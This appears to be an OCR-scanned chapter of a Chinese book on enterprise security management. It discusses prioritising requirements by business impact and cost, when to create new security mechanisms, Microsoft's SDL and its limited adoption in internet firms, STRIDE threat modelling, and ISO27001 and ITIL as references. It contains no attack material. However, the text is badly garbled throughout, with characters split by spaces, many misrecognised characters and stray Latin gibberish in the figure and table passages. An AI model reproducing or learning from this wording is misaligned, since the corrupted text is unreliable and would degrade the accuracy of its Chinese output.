目 。 产 品 经 理会 对 每 一 条 需求 评 佑 上 业务 影响 力 的 尺寸 ， 如 : XXXL 
影响 一 千 万 人 以 上 或 是 可 以 占 到 上 亿美 金 的 市 场 ，XXL 影 响 百 万 用 户 
或 是 占 了 千 万 金 级 别 以 上 的 市 场 ， 后 面 还 有 XL、L、M、S， 这 样 逐 级 
减 小 。 开 发 团队 也 一 样 ， 要 评估 投入 的 人 员 时 间 成 本 ，XXXL 表 示 要 
干 1 年 ，XXL 干 半年 ，XL 干 3 个 月 ,LL 干 两 个 月 ，M 干 一 个 月 ，S 干 两 周 


于 是 ， 可 以 这 样 推理 : 


业务 影响 力 是 XL， 时 间 人 员 成 本 是 5， 最 高 优先 级 。 


业务 影响 力 是 M， 时 间 人 员 成 本 是 M， 这 是 低 优 移 级 。 


业务 影响 力 古 Ss， 时 间 人 员 成 本 是 XL， 直 接 砍 掉 这 个 需求 。 
HETH ° 


业务 影响 力 是 XXL， 时 间 人 员 成 本 是 XXL， 需 要 简化 需求 ， 把 
需求 简化 成 XL， 时 间 人 员 成 本 变 成 M 以 下 。 


其 实 也 类 似 ， 风 险 和 修复 成 本 去 比较 ， 在 坚守 底线 的 基础 上 


综 上 所 述 ， 大 家 可 以 发 现 最 优 解 往往 不 一 定 是 最 安全 的 解 ， 市 场 
上 乙方 公司 渗透 测试 报告 中 提 的 修复 方案 有 些 也 十 无 法 实施 的 ， 很 多 
批判 企业 安全 做 得 不 好 的 帽子 们 ， 有 机 会 真 应 该 到 企业 里 体验 一 下 ， 
企业 安全 岂 征 找 洞 补 洞 这 么 简单 的 事 。 
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10217 ) 


3.6 需要 目 己 发 明 安 全 机 制 吗 


1. 安 全 机 制 的 舍 义 


首先 解释 一 下 发 明 安 全 机 制 这 句 话 的 意思 。 安 全 机 制 包括 : 常见 
的 对 称 和 非 对 称 加 密 算 法 ， 操 作 系统 自 带 的 RBAC 基 于 角色 的 访问 控 
制 ， 自 带 的 防火 墙 Netfilter，Android 的 基于 appid 隔 离 的 机 制 kernel% 
持 的 DEP (数据 段 执 行 保护 ) ， 以 及 各 种 ASLR (地 址 空间 随机 映 
射 ) ， 各 种 安全 函数 、 服 务 器 软件 的 安全 选项 ， 这 些 都 属于 已 经 存在 
的 安全 机 制 ， 注 意 我 用 的 词 是 “已 经 存在 ”， 而 这 个 话题 是 针对 是 不 是 
要 在 已 有 的 安全 机 制 上 再 去 发 明 新 的 安全 机 制 ， 比 如 三 星 手机 的 
KNOX， 就 是 在 Android 基 础 上 自己 造 了 个 轮子 。 


> 


2. 企 业 安全 建设 中 的 需求 


企业 安全 的 日 汕 工 作 走 不 是 也 会 面临 目 己 去 发 明 安 全 机 制 的 需 
求 ? 会 ,但 是 不 第 见 。 实 际 上 ， 在 日 常 中 发 生 的 绝 大 多 数 问题 都 属于 
对 现 有 安全 机 制 的 理解 有 误 、 没 有 局 用 或 没有 正确 使 用 安全 机 制 而 导 
致 的 漏洞 ， 而 不 是 缺少 安全 机 制 ， 所 以 绝 大 多 数 场 景 都 不 需要 去 发 明 
安全 机 制 。 发 明 安 全 机 制 是 需要 成 本 的 ， 且 需要 有 足够 的 目 信 ， 否 则 


不 健全 的 安全 机 制 消耗 了 开发 的 人 力 又 会 引入 新 的 安全 问题 ， 但 此 话 
不 绝对 。 


3 NSA 


那 什么 情况 下 应 该 发 明 安全 机 制 呢 ， 这 其 实 非 第 考验 判断 者 的 技 
术 实 力 。 之 前 也 提 过 对 于 很 多 安全 漏洞 的 修复 是 否 要 上 升 层 次 的 问 
题 ， 首 先 要 判断 这 是 单个 问题 还 是 属于 一 类 问题 ， 如 有 果 是 前 者 ， 用 救 
火 的 方式 墙 上 这 个 洞 吏 好 ， 没 必要 再 去 考虑 更 多 。 但 假如 这 是 一 类 问 
题 ， 而 你 义 没 提出 通 杀 这 一 类 问题 的 手段 束 会 永远 处 于 救火 之 中 ， 疲 
于 奔 命 。 如 果 是 一 类 问题 ， 分 儿 种 情况 。 第 一 种 归 入 安全 编程 能 力 不 
足 导致 的 安全 问题 ， 这 类 问题 不 需要 通过 导入 痢 机 制 解决 ， 而 征 通过 
加 强 SDL 的 某 些 环 生 ， 加 强 培训 教育 去 解决 。 第 二 种 情况 则 十 属 于 在 
相应 的 领域 还 没有 成 熟 的 安全 解决 方 条 或 者 现 有 的 安全 机 制 对 抗 强 度 
太 弱 ， 则 可 以 考虑 目 己 去 造 轮子 。 


比如 有 一 个 函数 存在 整形 淤 出 ， 但 只 有 在 极 特殊 的 情况 下 才能 触 
发 ， 平 时 开发 过 程 中 已 经 大 量 的 使 用 了 安全 函数 ， 局 用 了 编译 的 安全 
选项 ， 除 了 给 这 个 函数 加 一 个 条 件 判断 修复 这 个 bug 外 是 不 是 还 要 考虑 
更 进 一 层 的 防护 呢 ? 大 多 数 情况 下 显然 是 没 必 要 的 ， 假 如 这 是 一 个 公 
共 玉 数 ， 那 你 可 以 选择 把 修复 后 的 代码 封 净 成 安全 的 API， 避 人 免 其 他 
程序 员 自 己 实现 的 时 候 发 生 同 类 问题 。 
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利用 ， 而 这 种 解密 对 产品 的 影响 又 较 大 ， 假 设 殉 是 游戏 客户 端 跟 服务 
端 通信 的 指令 都 能 被 破解 和 仿冒 ， 那 这 种 情况 下 束 需 要 考虑 是 否 更 改 
或 创建 安全 机 制 ， 即 有 没有 必要 通过 实现 更 强 的 通信 协议 加 密 或 提高 
客户 端 反 调试 的 对 抗 等 级 来 缓解 这 一 问题 。 


如 有 果 你 说 新 建安 全 机 制 也 是 补 洞 的 话 ， 其 实 也 没 错 ， 殊 像 DEP 相 
对 于 用 户 态 的 程序 而 言 古 一 种 机 制 ， 而 对 于 操作 系统 和 冯 : 诺 依 曼 体系 
结构 而 言 是 一 个 洞 。 当 你 过 于 勤 备 地 在 很 微观 的 细节 上 补 洞 却 总 是 补 
不 完 的 时 候 ， 不 妨 俘 下 来 看 看 能 否 在 更 高 更 抽象 的 层次 上 打 个 补丁 。 


安全 工程 师 如 果 要 晋升 为 Leader 很 重要 的 一 点 吏 是 对 安全 事件 和 
安全 漏洞 的 抽象 能 力 ， 没 有 抽象 束 谈 不 上 PDCA， 束 意味 着 更 高 的 管 
理 者 对 安全 KPI 在 你 手 上 能 否 改进 不 一 定 有 信心 。 在 纵深 防御 体系 问 
中 高 阶段 发 展 时 ， 实 际 上 会 比较 多 的 遇 到 是 否 要 创新 安全 机 制 的 问 


题 ， 但 是 这 个 场景 大 多 数 公 司 未 必 会 遇 到 。 


3.7 ”如 何 看 得 SDL 


SDL (安全 开发 生命 周期 ， 优 化 模型 如 图 3-1 所 示 。 


图 3-1 “SDL 优化 模型 


SDL 起 源 于 微软 ，2004 年 将 SDL 引 入 其 内 部 软件 开发 流程 中 ， 目 的 
是 减少 其 软件 中 的 漏洞 数量 和 降低 其 严重 级 别 。SDL 侧 重 于 长 期 维 
护 、 流 程 改 进 并 能 够 帮助 开发 过 程 应 对 不 断 变 化 的 威胁 状况 。 早 些 年 
微软 的 产品 安全 问题 比较 多 ， 微 软 在 某 一 年 甚至 下 令 所 有 产品 线 开发 
计划 停止 半年 ， 全 部 用 于 整顿 安全 问题 。 起 初 SDL 适 用 于 传统 的 瀑布 


模型 和 螺旋 式 开 发 ， 到 了 2010 年 SDL 增 加 了 敏捷 的 部 分 改进 ， 用 于 应 
对 互联 网 下 的 Web 开 发 ， 目 前 SDL 的 “全 貌 " 如 图 3-2 所 示 。 


WELLER MELHER 使 用 批准 的 工具 动态 分 析 事件 响应 计划 
创建 质量 门 / 弃 用 不 安全 
核心 安全 培训 Bug 栏 | 分 析 攻 击 面 的 函数 


模糊 测试 BARS 


| 安全 和 隐私 风 /| ”威胁 建 模 | PSAN | 攻击 面 评析 /| 发 布 存档 
险 评估 i | | 


j 
| 


图 3-2”SDL 整 体 框 架 


基本 软件 安全 培训 应 泗 盖 的 基础 概念 如 下 所 示 。 


:安全 设计 ， 包 括 以 下 主题 : 


PV) BUG Tal 


深度 防御 


-最 小 权限 原则 


-安全 默认 设置 


:威胁 建 模 ， 包 括 以 下 主题 : 


:威胁 建 模 概述 


:威胁 模型 的 设计 意义 


-基于 威胁 模型 的 编码 约束 

安全 编码 ， 包 括 以 下 主题 : 

- 缓 种 区 溢出 《对 于 使 用 C 和 C++ 的 应 用 程序 ) 
-整数 算法 错误 (对 于 使 用 C 和 C++ 的 应 用 程序 ) 
- 跨 站 点 脚本 (对 于 托管 代码 和 Web 应 用 程序 ) 
SQL 注入 (对 于 托管 代码 和 Web 应 用 程序 ) 
弱 加 密 
安全 测试 ， 包 括 以 下 主题 : 

:安全 测试 与 功能 测试 之 间 的 区 别 

-风险 评估 

:安全 测试 方法 
隐私， 包括 以 下 主题 : 

:隐私 敏感 数据 的 类 型 


:隐私 设计 最 佳 实践 


-风险 评估 


:隐私 开发 最 住 实践 


:隐私 测试 最 佳 实践 


:高 级 概念 方面 的 培训 ， 包 括 但 不 限于 以 下 方面 : 


:高 级 安全 设计 和 体系 结构 


可 信用 户 界 面 设计 


安全 漏洞 细节 


实施 目 定 义 威胁 缓解 


先 看 这 份 培训 列表 。 能 把 这 些 彻 底 讲 明日 的 人 其 实 还 是 资深 工程 
师 以 上 的 人 。 有 人 可 能 党 得 我 说 的 夸张 了 ， 原 因 在 于 大 部 分 互联 网 公 
司 的 研发 环境 主要 是 web， 有 很 多 人 能 把 SQL 注入 、XSS、CSRF 这 些 
讲 请 楚 ， 但 问题 是 这 样 就 算 SDL 了 人 么 ? 非 也 ， 当 下 热闹 的 安全 大 会 各 
种 讲 攻防 的 议题 ， 但 这 些 离 真正 的 产品 安全 设计 还 差 很 远 ， 行 业 的 普 
裔 现状 是 能 做 入 侵 检测 ， 能 把 漏洞 修补 原理 说 清楚 ， 但 很 少 有 人 能 把 
全 架构 设计 非常 体系 化 的 讲 清 楚 。 很 多 人 认为 SDL 在 互联 网 公司 无 
完全 落地 的 原因 是 因为 DevOps 模 式 下 的 频繁 交付 导致 DL 显得 过 
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于 “厚重 *”， 我 觉得 这 只 说 对 了 一 半 ， 根 据 大 多 数 互 联网 公司 现行 的 模 
式 ， 我 加 了 一 个 帽子 ， 姑 且 就 叫 “ 攻 防 驱 动 修改 * 吧 。 


3.7.1 ”攻防 驱动 修改 


大 多 数 甲 方 安全 团队 所 做 的 工作 实际 上 处 于 这 个 维度 。 通 过 对 已 
知 的 攻击 手段 ， 例 如 SQL 注 入 ，XSS 等 建立 事前 的 安全 编码 标准 ， 并 在 
发 布 前 做 代码 审计 、 渗 透 测试 和 提出 漏洞 修补 方案 。 这 种 模式 的 显 普 
优 氮 是 针对 性 比较 强 ， 直 入 主题 ， 见 效 快 。 


向 持 的 流程 + 事件 续 动 型 构成 了 这 种 日 肖 行 为 的 本 质 ， 信 单 的 流程 
通常 包括 : 


-事前 基线 : Web 安 全 编码 标准 ， 各 公司 内 部 范围 流传 的 APP 应 用 
安全 设计 文档 ， 这 个 文档 的 质量 水 平 通常 可 以 兰 很 还 ， 当 然 文档 永远 
只 是 文档 ， 可 能 就 古 开 发 部 | 不 强制 不 考试 800 年 部 不 看 的 东西 。 


- 事 中 措施 ， 代 码 审计 ， 发 布 前 过 一 轮 扫描 器 + 渗透 测试 。 
:事后 机 制 ，HTTP 全 流量 IDS，Web 日 志 大 数据 分 析 ， 等 等 


-事件 驱动 :发 现 了 新 的 安全 问题 整 “ 事 后 诸 净 亮 一 把 ?>， 做 点 补救 
性 措施 。 
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威胁 建 模 等 工作 而 言 ， 它 似乎 不 用 发 散 精 力 投 入 太 多 束 能 覆盖 已 知 的 
攻击 点 ， 而 且 在 研发 侧 不 用 面 对 比 较 大 的 “推动 SDL 沙 地 的 压力 ” 


但 是 它 的 缺点 也 是 显而易见 的 ， 由 于 过 程 方法 论 的 施 力 后 的 比较 
偏 事后 ， 所 以 在 从 源头 上 发 现 和 改进 问题 的 能 力 不 足 ， 弱 于 在 产品 内 
建 的 安全 机 制 上 建立 纵深 防御 ， 被 绕 过 的 可 能 性 比较 大 ， 事 后 的 bug 率 
到 一 定 程度 就 很 难 再 改善 ， 只 能 通过 不 断 的 攻防 对 抗 升 级 去 事后 修 
人 名。 笼统 一 上 扩 讲 整 是 考虑 不 够 系统 性 。 这 跟 当 前 安全 行业 缺少 真正 的 
安全 架构 设计 人 才 有 天 ， 攻 防 的 声音 铺 天 访 地 ， 跟 国外 比 一 下 在 设计 
和 工程 化 方面 差距 不 小 。 


事后 修补 是 不 是 总 是 有 效 的 ， 颖 颖 补 补 的 感觉 你 觉得 会 如 何 呢 ， 
对 于 公司 的 边缘 性 产品 你 可 以 布 望 它 早日 归 入 历史 的 侍 埃 ， 而 对 于 公 
司 的 支柱 型 产品 你 只 能 寄 希 望 于 某 一 个 大 版 本 更 新 时 把 某 些 机 制 推倒 
重新 来 过 。 


3.7.2 SDL 落地 率 低 的 原因 


1.DevOps 的 交付 模式 


ERWIN, 不同 于 传统 的 软件 开发 过 程 。 如 果 一 
个 软件 要 一 年 交付 ， 那 么 在 前 期 抽出 2~4 周 做 安全 设计 也 可 以 接受 ,但 
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足够 的 时 间 去 思考 安全 这 件 事 。 对 于 SDL 会 拖 慢 整个 发 布 节 到 这 个 问 
题 上 ， 安 全 团队 去 推动 也 会 直面 公司 管理 层 和 研发 线 的 挑战 。 不 过 当 
你 有 经 验 丰 富 的 安全 人 员 和 上 自动 化 工具 支持 时 ，SDL 在 时 间 上 是 可 以 
大 大 缩短 的 。 


2. 历 史 问 题 


99% 的 甲 方 安全 团队 的 工作 都 是 以 救火 方式 开始 ，SDL 从 来 都 不 是 
安全 建设 第 一 个 会 想到 的 事情 ， 而 且 业 内 心照 不 宣 的 一 个 原因 是 ,“ 事 
前 用 不 上 力 ， 偏 事后 风格 的 安全 建设 ”贯穿 于 大 多 数 安全 团队 的 主线 。 
之 所 以 如 此 ， 原 因 是 第 一 有 火 必 救 ， 有 的 团队 救火 上 疗 ， 有 的 则 能 抽 
号 转向 系统 性 建设 ;第 二 想 在 事前 用 力 ， 需 要 目 己 足 够 强大 ， 能 摆平 
人 研发， 不够 强大 就 会 变 成 唐人 自 扰 ， 自 讨 没 趣 ， 还 不 如 回避 。 


3. 业 务 模式 


大 多 数 平 全 级 互联 网 公司 的 开发 以 Web 为 主 ， 超 大 型 互联 网 公司 才 
会 进入 底层 架构 造 轮子 的 阶段 ， 而 对 于 以 Web 产 品 为 主 的 安全 建设 ， 第 
一 古事 后 修补 的 成 本 比较 低 ， 屡 试 不 夹 ， 第 二 是 部 分 产品 的 生命 周期 
不 长 ， 这 两 点 一 定 程度 上 会 让 很 多 后 加 入 安全 行业 的 新 同学 认为 “ 救 
火 ”=“ 安 全 建设 *。 但 是 在 甲 方 每 久 了 的 人 一 定 会 发 现 ， 哪 怕 是 Web， 只 
要 系统 比较 大 ， 层 层 肉 套 和 不 同 子 系统 间 的 接口 调用 ， 会 使 得 某 些 安 


全 问题 的 修补 成 为 疑难 病症 ， 可 能 束 古 设计 之 初 没有 考虑 安全 ， 人 致使 
问题 不 能 得 到 根治 。 时 间 一 从 ， 技 术 俩 越 积 越 多 ， 大 家 最 后 一 致 玲 认 


这 个 问题 没 法 解决 。 


4.SDL 的 门槛 


其 实 SDL 是 有 门 柏 的 ， 而 且 还 不 低 。 最 重要 有 两 点 : 第 一 点 是 安 
全 专家 少 ， 很 多 安全 工作 者 懂 攻 防 但 未 必 懂 开发 ， 人 慌 漏 洞 但 未 必 慌 设 
计 ， 所 以 现实 往往 是 很 多 安全 团队 能 指导 研发 部 门 修复 漏洞 ， 但 可 能 
没 意 识 到 其 实 缺少 指导 安全 设计 的 积累 ， 因 为 安全 设计 是 一 件 比 漏洞 
修复 门 椎 更 高 的 事 。 看 业内 很 多 技术 不 错 的 安全 人 研究 者 ， 写 的 文章 ， 
往往 前 半 篇 漏洞 分 析 很 给 力 ， 但 到 了 安全 建议 环 世 好 像 束 觉得 少 了 点 
什么 。 第 二 点 是 工具 文 择 少 ， 静 态 代 码 扫 摘 、 动 态 Fuzz 等 ， 工 欲 善 其 
事 必 爷 利 其 如 ，Facebook 宣 称 其 最 好 的 程序 员 是 投入 到 工具 开发 的 ， 
而 对 于 国内 很 多 安全 团队 而 言 ， 最 好 的 人 都 不 会 用 在 工具 开发 上 ， 而 
定理 斗 在 攻防 第 一 线 做 救火 队长 。 稍 微 好 一 点 的 情况 生 这 玫 人 投入 在 
做 安全 机 制 建设 上 ， 而 业务 部 门 也 不 会 来 帮助 安全 团队 开发 安全 工 
具 。 这 还 跟 公 司 整 体 上 是 否 重视 目 动 化 测试 有 关 ， 如 琳 公 司 在 测试 领 
域 的 实践 没有 做 到 很 前 沿 ， 那 么 安全 的 黑白 盒 测 试 也 不 会 注重 工具 化 
建设 ， 代 码 覆 盖 率 和 路 径 深 度 等 更 加 不 会 有 人 去 关注 了 。 实 际 上 不 一 
定 要 在 这 个 场景 下 目 己 去 造 轮 和 于， 用 商业 工具 是 不 错 的 选择 。 


3.7.3 ”因地制宜 的 SDL 实 践 


1. 重 度 的 场景 


对 于 公司 内 俩 发 的 仿 压 层 的 大 型 软件 ， 和 迭代 周期 较 长 ， 对 染 构 设 
计 要 求 比较 全 面 ， 后 期 改动 成 本 大 ， 如 果 安 全 团队 人 手 够 的 话 ， 这 种 
场景 应 该 尽量 在 事前 切入 ， 在 立项 设计 阶段 就 应 该 进行 安全 设计 和 威 
胁 建 模 等 工作 。 相 比 在 事后 贴 狗 皮 膏药 ， 这 种 事前 的 时 间 投 入 是 值得 
的 ,门框 主要 还 是 人 。 


对 于 较 大 软件 的 “大 版 本 ”， 包 括 每 个 产品 初始 版 本 ， 还 比如 标杆 
产品 的 1.0 到 2.0 类 似 这 种 里 程 碑 式 的 版 本 发 布 ， 修 改 和 增加 了 很 多 功能 
上 态 ， 甚 至 修改 了 的 层 的 通信 协议 ， 这 种 也 需要 较 完整 的 SDL， 当 然 这 
种 版 本 跳跃 有 时 候 只 是 对 外 的 一 种 写 销 手段 ， 不 一 定 是 技术 上 的 大 修 
A, AARRE KMET ° 


2. 轻 度 的 场景 


对 于 染 构 镜 单 、 开 发 周期 短 、 交 付 时 间 要 求 比较 紧 的 情况 ， 显 然 
完整 的 SDL 了 就 太 重 度 了 ， 这 个 时 候 ， 攻 防 张 动 修改 吏 足 以 解决 问题 。 


其 他 的 诸如 小 版 本 发 布 ， 技 术 上 没有 大 的 修改 ， 也 没 必 要 去 跑 全 
量 SDL， 否 则 束 太 教条 和 僵化 了 ° 


3.7.4 SDL 在 互联 网 企业 的 发 展 


目前 SDL 在 大 部 分 不 太 差 钱 的 互联 网 企业 属于 形式 上 都 有 ， 但 落 

地 的 部 分 会 比较 粗糙 。 通 党 只 有 一 两 个 环节 。 最 主要 的 瓶颈 还 是 人 和 

工具 的 缺失 。 以 前 互联 网 企业 只 生产 Web， 攻 防 张 动 修改 得 以 应 付 ， 但 
是 现在 大 型 的 互联 网 企业 不 再 只 生产 Web， 而 是 会 目 己 生产 诸如 分 布 式 
数据 库 、 浏 唤 器 、 手 机 操作 系统 这 样 的 大 型 软件 ， 单 纯 的 攻防 驱动 修 
改 已 经 日 渐 乏 力 ， 没 有 足够 的 安全 设计 能 力 将 无 法 应 对 未 来 的 威胁 。 

因此 推测 以 后 的 安全 行业 中 ， 设 计 方 面 的 人 才 会 严重 缺失 ， 大 部 分 甲 

方 安全 团队 仍然 游离 在 设计 的 大 门 之 外 ， 只 有 一 些 大 型 厂商 正在 借 研 

究 之 名 来 做 一 些 改 进 安 全 设计 的 工作 ， 期 待 这 些 大 型 广 商 们 能 市 一 市 

团队 ， 给 这 个 行业 培养 一 些 生力军 。 


SDL 除 了 最 早 基 于 传统 瀑布 模型 的 版 本 ， 以 及 为 DevOps 优 化 的 版 
本 ， 实 际 上 在 实践 阶段 还 可 以 优化 成 极速 发 布 的 版 本 ,或 着 干 脆 不 退 
求 SDL 而 从 其 他 的 维度 来 弥补 SDL 不 健全 的 问题 ， 其 实现 的 本 质 是 原来 
的 SDL 对 人 研发 流程 的 修改 有 点 像 “ 阻 塞 式 IO 模 型 "*， 而 现在 可 以 通过 工具 
和 技术 手段 使 其 变 成 "异步 IO 模型 ”， 从 更 高 维度 补贴 SDL 的 思路 在 这 里 
不 再 展开 ， 后 续 会 在 笔者 博客 上 专题 分 享 。 


WEXKSDLA +: https://www.microsoft.com/zh- 
cn/download/details.aspx?id=12379 


3.8 STRIDE 威 胁 建 模 


STRIDE 


征 微软 开发 的 用 于 威胁 建 模 的 工具 ， 或 者 是 说 一 套 方法 论 


吧 ， 它 把 外 部 威胁 分 成 6 个 维度 来 考察 系统 设计 时 存在 的 风险 点 ， 这 


个 维度 首 字母 的 缩写 就 是 STRIDE， 分 别 为 ，Spoofing (RB) > 


Tampering ($ 


S20) 、Repudiation 〈 否 认 ) ` Information Disclosure ( 信 


NEYE) ` Denial of Service (拒绝 服务 ) 和 Elevation of Privilege (权限 


提升 ) ， 如 表 3-1 所 示 。 
表 3-1 ” STRIDE 威胁 建 模 
属性 威胁 定义 例子 
认证 Spoofing (假冒 ) 冒充 某 人 或 某 物 假冒 bilg, microsoft.com 或 ntdll. 
dll 
= Tampering (#2) 修改 数据 和 代码 修改 一 个 DLL ， 或 一 个 局 域 网 
完整 性 
的 封包 
Repudiation (否认 ) 宣称 未 做 过 某 个 行为 “我 没有 发 送 email” “RRA 
不 可 抵赖 性 修改 文件 "“ 我 肯定 没有 访问 那个 
机 密 性 an aaa ( 信 | 暴露 信息 给 未 经 授权 的 | 允许 某 人 阅读 Windows 源 代 
息 泄露 ) 访问 者 码 ; 将 客户 列表 发 布 在 网 站 上 
Denial of Service (拒绝 服务 )| ”使 对 服务 对 用 户 拒绝 访 | 发 送 数据 包 使 目标 系统 CPU 
可 用 性 问 或 降级 满 负 荷 或 发 送 恶 意 代码 使 目标 服 
Elevation of Privlege (4% PR} 未 经 授权 获取 权限 远程 用 户 执 行 任意 代码 ， 普 通 
授权 提升 ) 用 户 可 以 执行 管理 员 私 有 的 系统 


STIRDE 如 何 使 用 ? 先 画 出 数据 流 关 系 图 (DED) 用 图 形 方式 表示 


系统 ，DFD 使 用 一 组 标准 符号 


a 


其 中 包含 四 个 元 素 : 数据 流 、 数 据 存 


储 、 进 程 和 交互 方 ， 对 于 威胁 建 模 ， 男 外 增加 了 一 个 元 素 ， 即 信任 边 
界 。 数 据 流 表 示 通 过 网 络 连接 、 命 名 管道 、 消 息 队 列 、RPC 通 道 等 移 
动 的 数据 。 数 据 存 储 表示 文本 、 文 件 、 关 系 型 数据 库 、 非 结构 化 数据 
等 。 进 程 指 的 是 计算 机 和 运行 的 计算 或 程序 。 然 后 对 每 一 个 节点 元 素 和 
过 程 进行 分 析 判 断 是 否 存在 上 述 6 种 威胁 ， 并 制定 对 应 的 风险 缓解 措 
施 。 例 如 图 3-3 所 示 的 情况 。 


销售 001 


销售 NNW 


客户 信任 边界 服务 器 


(DD 销售 001 一 收集 和 分 析 过 程 
2) 销售 团队 系统 列表 一 收集 和 分 析 过 程 
@ 收集 和 分 析 过 程 一 分 析 过 程 


图 3-3” ”STRIDE 示例 


AH, O` O`ORLRBFERE > RA > EARS HK, Ar 
在 这 些 环节 都 需要 考虑 认证 、 鉴 权 、 加 密 、 输 入 验证 等 安全 措施 。 但 
根据 风险 的 不 同 ， 过 程 3) 在 内 网 的 服务 器 被 拒绝 服务 的 风险 较 小 ， 而 
在 Internet 上 传输 的 过 程 册 所 受到 的 监听 和 自 改 的 风险 更 大 ， 所 以 在 每 
个 环节 上 采取 的 风险 削减 措施 的 力度 会 不 一 样 ， 这 实际 上 也 是 什么 安 
全 措施 一 定 要 落地 、 什 么 安全 措施 可 以 适当 妥协 的 一 个 参考 视角 。 很 
多 安全 从 业者 所 接受 的 安全 认 知 往往 是 进入 一 家 企业 后 ， 拿 到 一 份 名 
为 应 用 开发 安全 标准 的 文档 ， 里 面 描述 了 访问 控制 、 输 入 验证 、 编 码 
过 滤 、 认 证 鉴 权 、 加 密 、 日 志 等 各 种 要 求 ， 久 而 久之 就 变 成 了 一 种 惯 
性 思维 ,实际 上 之 所 以 要 这 么 做 十 因为 在 系统 设计 的 某 个 环 市 存在 
STRIDE 中 的 一 种 或 几 种 风险 ， 所 以 在 那个 设计 关注 点 上 要 加 入 对 应 的 
安全 措施 ， 并 不 是 在 所 有 的 地 方 都 要 套用 全 部 的 或 千篇一律 的 安全 措 
HE ° SUBS RRA MR: “过 度 的 安全 设计 ”。 威 胁 建 模 的 成 
果 跟 工作 者 目 映 的 知识 也 有 很 大 的 关系， 有 攻防 经 验 的 人 比较 容易 判 
上 晰 威 肋 的 来 源 和 利用 场景 ， 如 和 革 缺少 这 方面 的 认 知 ， 可 能 会 发 现 到 处 
征 风 险 ， 有 些 风险 的 利用 场景 很 少 或 利用 条 件 非 向 奇 刻 ， 如 有 果 一 味 地 
强调 风险 削减 措施 也 会 变 成 有 点 纸上谈兵 的 味道 ， 虽 然 从 安全 的 角度 
没有 错 ， 但 从 产品 交付 的 整体 视角 看 ， 安 全 还 是 做 过 头 了 。 


总 体 上 看 ，STRIDE 是 一 个 不 错 的 参考 视角 ， 即 便 有 丰富 攻防 经 验 
的 人 也 不 能 保证 目 己 在 面 对 复杂 系统 的 安全 设计 时 考虑 是 全 面 的 ， 而 
STRIDE 则 有 助 于 风险 识别 的 宪 盖 面 。 


以 上 的 例子 是 high level 的 威胁 建 模 ，low level 的 威胁 建 模 需 要 画 了 
时 序 图 后 根据 具体 的 协议 和 数据 交互 进行 更 进一步 的 分 析 ， 细 节 可 以 
参考 威胁 建 模 相关 的 方法 论 ， 但 不 管 是 high level 还 是 low level 都 比较 依 
赖 于 分 析 者 自身 的 攻防 技能 。 


威胁 建 模 : 使 用 STRIDE 方 法 发 现 安全 设计 缺陷 


(http://msdn.microsoft.com/zh-cn/magazine/cc163519.aspx ) ° 


STRIDE Æ 


(http://blogs.microsoft.com/cybertrust/2007/09/11/stride-chart/ ) ° 


3.9 ”关于 ISO27001 


1. 重 建 对 安全 标准 的 认 知 


虽然 标题 用 了 ISO27001， 但 实际 上 这 里 可 以 指 代 所 有 的 安全 标准 
和 安全 理论 。 木 桶 理论 安全 界 的 人 都 知道 ， 但 用 到 实际 工作 中 ， 没 太 
大 用 ， 说 到 底 就 是 给 外 行 解释 安全 这 件 事 的 一 个 通俗 比喻 而 已 。 业 内 
有 些 声 音 认 为 安全 标准 堵 不 住 漏洞 ， 所 以 安全 标准 都 是 没 用 的 “ 废 
物 ”， 这 种 论据 显然 是 有 问题 的 ， 首 移 安 全 标准 的 制定 承 不 是 为 了 堵 漏 
洞 ， 所 以 安全 标准 跟 漏 洞 没 关系 ， 完 全 两 个 层面 的 东西 ， 不 能 拿 来 说 
事 ， 堵 漏洞 有 具体 的 技术 手段 ， 但 安全 建设 并 不 只 有 堵 漏 洞 这 种 微观 
对 抗 。 


那 安 全 标准 到 确 有 什么 用 ， 我 用 最 通俗 的 语言 解释 一 过 ， 安 全 标 
准 归根 结 底 是 为 了 给 你 一 个 参考 和 指引 ， 当 你 把 基础 的 技术 防护 手段 
实施 之 后 ， 过 了 上 任 之 初 的 救火 阶段 之 后 ， 束 需要 停 下 来 思考 一 下 整 
个 企业 安全 范畴 中 ， 哪 些 事情 是 短 板 ， 哪 些 领域 尚且 空 日 ， 需 要 在 哪 
些 点 上 继续 深 控 才能 履 凋 公司 整体 的 安全 建设 ， 而 安全 标准 的 价值 殉 
征 告 诉 你 ， 在 安全 建设 的 领域 里 可 能 有 那么 100 件 事情 是 需要 做 的 ， 但 
具体 选择 只 做 80 件 还 是 99 件 还 是 100 件 全 做 是 你 自己 的 事情 ， 它 只 告诉 
你 100 件 事情 是 什么 但 是 这 100 件 事情 怎么 实现 ， 对 应 的 技术 方案 或 


流程 是 什么 它 不 会 告诉 你 ， 实 现 和 落地 是 需要 上 自己 去 想 的 ， 它 本 质 上 
征用 于 开拓 视野 ， 跟 堵 不 墙 调 洞 完全 没 冲突 ， 换 名 话说 它 是 一 本 书 的 
目录 ， 但 对 于 每 个 章节 怎么 写 则 取决 于 你 目 己 ， 你 可 以 买 WAF 也 可 以 
加 国 容 器， 也 可 以 像 偏 执 狂 一 样 地 做 代码 审计 ， 至 于 墙 漏 洞 那 只 是 每 
个 章 市 里 的 一 段 文字 而 已 。 


2. 最 实用 的 参考 


对 互联 网 公司 而 言 ， 我 认为 有 几 个 非常 刚 需 的 参考 : 


‘ITIL (BS15000/ISO20000) 一 一 绝 大 多 数 互 联网 公司 的 运 维 流程 
都 是 以 ITIL 为 骨 染 建立 的 ， 甚 至 连 内 部 的 运 维 管理 平台 ， 监 控 系 统 
都 能 一 眼看 出 ITIL 的 特征 。 而 偏 运 维 侧 的 安全 ， 基 础 架构 与 网 络 安 
全 ， 这 部 分 的 安全 建设 是 以 运 维 活动 为 主干 ， 在 运 维 活动 上 添加 安全 
环 市 来 实现 安全 管理 的 。 所 以 想 在 运 维 侧 建 立 安全 流程 必须 熟悉 
ITIL， 把 安全 环节 衔接 到 所 有 的 发 布 、 变 更 、 配 置 、 问 题 和 事件 管理 
之 上 ， 而 不 是 打破 原来 既 有 的 运 维 流程 ， 再 去 独创 一 个 什么 安全 流 
程 。 


:SDL 一 一 人 研发 侧 的 安全 管理 ， 绝 大 多 数 公司 都 借鉴 了 微软 的 
SDL， 即 便 是 再 有 想法 的 甲 方 安全 团队 也 离 不 开 它 ， 所 以 无 论 如 何必 
须 掌 握 SDL ° 


ISO27001 一 一 企业 安全 管理 领域 的 基础 性 安全 标准 ， 所 谓 基础 残 
是 不 能 比 这 个 更 加 精 和 侧 了 ， 你 可 以 不 碰 那 些 高 大 上 的 ， 但 是 ISO 27001 
